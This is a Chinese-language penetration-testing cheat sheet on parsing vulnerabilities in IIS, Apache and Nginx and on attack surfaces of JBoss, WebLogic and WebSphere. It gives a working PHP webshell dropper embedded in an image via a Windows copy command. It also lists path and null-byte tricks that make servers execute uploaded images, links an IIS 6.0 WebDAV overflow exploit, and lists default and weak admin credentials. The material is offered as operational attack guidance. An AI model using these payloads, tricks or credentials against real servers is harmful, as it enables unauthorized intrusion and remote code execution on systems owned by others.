中间件解析漏洞

IIS
IIS解析漏洞
IIS 6.0 解析利用方法有两种：
1. 目录解析
建立xx.asp为名称的文件夹，将asp文件放入，访问/xx.asp/xx.jpg，其中xx.jpg可以为任意文件后缀，即可解析
2. 文件解析
后缀解析：/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)
3. 默认解析：
/xx.asa ，/xx.cer，/xx.cdx

IIS7.5/ IIS 7.0/ Nginx <8.03 畸形解析漏洞
IIS 7.5 的解析漏洞利用手法，在正常图片URL后添加 /.php
常用利用方法： 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾
内容
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]?>');?>
通过windows下copy命令合成，或者用hex工具直接写也可以
然后访问xx.jpg/x.php,在这个目录下就会生成一句话木马shell.php

测试：图片1.jpg 创建webshell.txt，写入<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]?>');?>
在windows下打开cmd,命令为：copy 1.jpg /b + webshell.txt /a 1webshell.jpg
访问1webshell.jpg/.php

在当前目录下就生成了一个php文件shell.php

IIS PUT漏洞
2 个错误配置造成
1.WEB 服务器扩展里设置WebDAV为允许；
2. 网站权限配置里开启了写入权限。
使用桂林老兵的工具

IIS溢出漏洞
开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行，针对 Windows Server 2003 R2
POC: https://github.com/edwardz246003 ... b/master/exploit.py

Apache

解析漏洞
后缀解析：test.php.x1.x2.x3
Apache 将从右至左开始判断后缀，若x3非可识别后缀，再判断x2，直到找到可识别后缀为止，然后将该可识别后缀进解析
test.php.x1.x2.x3 则会被解析为php
经验之谈：php|php3|phtml|php4|php5 多可被Apache解析

Nginx
解析漏洞
Nginx <8.03 畸形解析漏洞
直接在正常图片URL后添加 /.php
Nginx <=0.8.37
在Fast-CGI关闭的情况下，Nginx <=0.8.37 依然存在解析漏洞
在一个文件路径(/xx.jpg)后面加上%00.php会将 /xx.jpg%00.php 解析为 php 文件。
这是从 /test.jpg/x.php 演变过来的，具体可以参考：Ngnix空字节可远程执行代码漏洞

JBOSS
存在java反序列化命令执行
端口：8080（Web）、9990（Console）
管理面板：http://<host>:9990
弱口令
jboss:jboss
admin:admin

Weblogic
存在java反序列化命令执行
端口 7001、7002（Web、Console）
管理面板：http://<host>:7001/console/
弱口令
weblogic:weblogic
system:system
portaladmin:portaladmin
guest:guest
weblogic:admin123
weblogic:weblogic123

WebSphere
存在java反序列化命令执行
端口：9080、9443（Web）、9060、9043（Console）、…
管理面板：
http://<host>:7043/ibm/console/logon.jsp